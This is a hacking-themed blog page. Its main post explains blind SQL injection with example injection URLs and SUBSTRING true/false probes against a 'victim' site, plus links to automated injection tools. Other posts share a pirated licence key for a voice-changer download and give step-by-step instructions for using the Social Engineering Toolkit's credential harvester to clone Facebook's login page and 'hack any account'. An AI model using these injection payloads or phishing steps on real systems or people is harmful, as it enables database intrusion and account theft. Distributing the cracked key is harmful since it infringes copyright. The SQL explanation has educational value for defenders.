Anonymous voice changer. how it works.

-
Image
Hello, Guys am sure you have wondered what kinda voice do the  Anonymous uses when broadcasting on air, and you may have also tried your hands to download some of the voice changers applications, which resemble with real anonymous voice, and today will show you the exact voice changing machine that actual anonymous hackers use today. The Anonymous voice changer download link;  here Use the key below to Activate it. Register Name: www.serials.ws Register Company name: www.serials.ws The Registerd Lisence key: AA-15F01A-9719E1-EC031E-4C97F2-65ACA8 PLEAS TAKE Note: I Don't Make Any Copyright Infringements.
Post a Comment

BLIND SQL INJECTIONS

-

SQL injection is a well know and exploited technique that mainly exploited in web enviroment.sql injections allows an attacker to reach the database.
which ask the database true or false questions and determine the answer
based on the system's response.

examples of SQL injections

http://victim/listproducts.asp?cat=books
SELECT * from PRODUCTS WHERE category=‘books’

http://victim/listproducts.asp?cat=books’ or ‘1’=‘1
SELECT * from PRODUCTS WHERE category=‘books’ or ‘1’=‘1’

Basically, on SQL injection the attacker gets results.



Blind sql injections

Same vulnerability as SQL injection
*Very* common vulnerability
Sometimes (wrongly) ignored during tests as unexploitable or not detected
The attacker can not retrieve results
The attacker can only retrieve a True/False condition

example. of blind sql injections

http://victim/showproduct.asp?id=238

SELECT * from PRODUCTS WHERE id=238
Sometimes, due to the code surrounding the SQL query (grouped or sorted) the attacker can’t UNION and no ‘good’ ways of exploitation are found
http://victim/showproduct.asp?id=238 and 1=1
http://victim/showproduct.asp?id=238 and 1=2
SELECT * from PRODUCTS WHERE id=238 and 1=1
SELECT * from PRODUCTS WHERE id=238 and 1=2

Blind SQL happens if the requests above return different results


Exploiting True/False conditions
Select user returns ‘dbo’
SUBSTRING(‘Select user’, 1, 1) = ‘d’
SUBSTRING(‘Select user’, 2, 1) = ‘b’
SUBSTRING(‘Select user’, 3, 1) = ‘o’

http://victim/showproduct.asp?id=238 and SUBSTRING(‘Select user’, 1, 1) = ‘d’   TRUE
http://victim/showproduct.asp?id=238 and SUBSTRING(‘Select user’, 1, 1) = ‘X’  FALSE


Available solutions

Custom Script: We can script it and discover each letter
Set a space: [a-z] + [A-Z] + [0-9] + [symbols]
Loop for every character
Absinthe
http://www.0x90.org/releases/absinthe/
BSQLBF
http://www.unsec.net/download/bsqlbf.pl 
http://www.unsec.net/download/bsqlbf.avi
SQLMap, SQLBrute.py
#cybersecurity #hacking #security #technology #hacker #infosec #tech #ethicalhacking #programming #linux #hackers #cyber #kalilinux #cybercrime #malware #python #privacy #it #iot #cyberattack #coding #dataprotection #hack #ethicalhacker #networking #informationsecurity #cybersecurityawareness #programmer #datasecurity #bhfyp #nasvera #sql #cyber


Comments

Post a Comment

Popular posts from this blog

INSTALLING VISUAL PARADIGM ON KALI LINUX

-
Image
                                                  Hello guys i'll be showing a simple way of installing Visual Paradigm on kali linux. 1. Dowload Vissual Paradigm form http://www.visual-paradigm.com/download/?platform=linux&arch=64bit 2. open the terminal use the following command to install, “ bash ./%Visual_Paradigm_13_0_20160203_Linux64.sh ” Not that when you use the command this way it will give an error saying “bash: ./%Visual_Paradigm_13_0_20160203_Linux64.sh: No such file or directory ” in other to use the “bash” command you need to specifies the directory  in which the file is in.
Read more

installing WordPress on Kali linux

-
As we'll know wordpressis an open source website bulider and blogging which php,over 20% of the blogg and website on the internet is beening manager by wordpress..it also has over 20-30 thousand plugging to add more functionality to you website. before we install Word Press we need to install what is known as LAMP(Linux Apache Mysql Php) as our server.Note: you can also use this process to install it on any linux distrbution. For     Apache use: "Sudo apt-get install apache2"                       Mysql: "sudo apt-get install mysql"                                  php:"sudo apt-get install phpmyadmin" Now that  we are done install our LAMP, we can now install wordpress
Read more

Hacking Facebook Using Social Engineering Toolkit in Kali linux

-
Image
we are going to make use of Kali Linux, and the tool call SET (Social Engineering Toolkit). to hack any account that we like. so let get started now. The  ‘toolkit’ options we are going used   step 1 Social Engineering Attacks  step 2 Website Attack Vectors step  3 Credential Harvester Attack Method step  4 Web Templates step  5 Input the IP address step 6 Choose facebook First things first power on your Kali Linux machine and open up a  terminal and type in "setoolkit" and you will be shown a welcome screen and attack options to pick from. and we will pick number one coz we are performing social engineering. the next step is for us to click on the website attack options by typing in 2 thirdly we select options 3 which is credential harvester attack method. now we will choose a web site template of the website we want to attack which is Facebook  after which  then we have to set an attacker IP address which is our system. to check for ur IP address type in "ifconfig"
Read more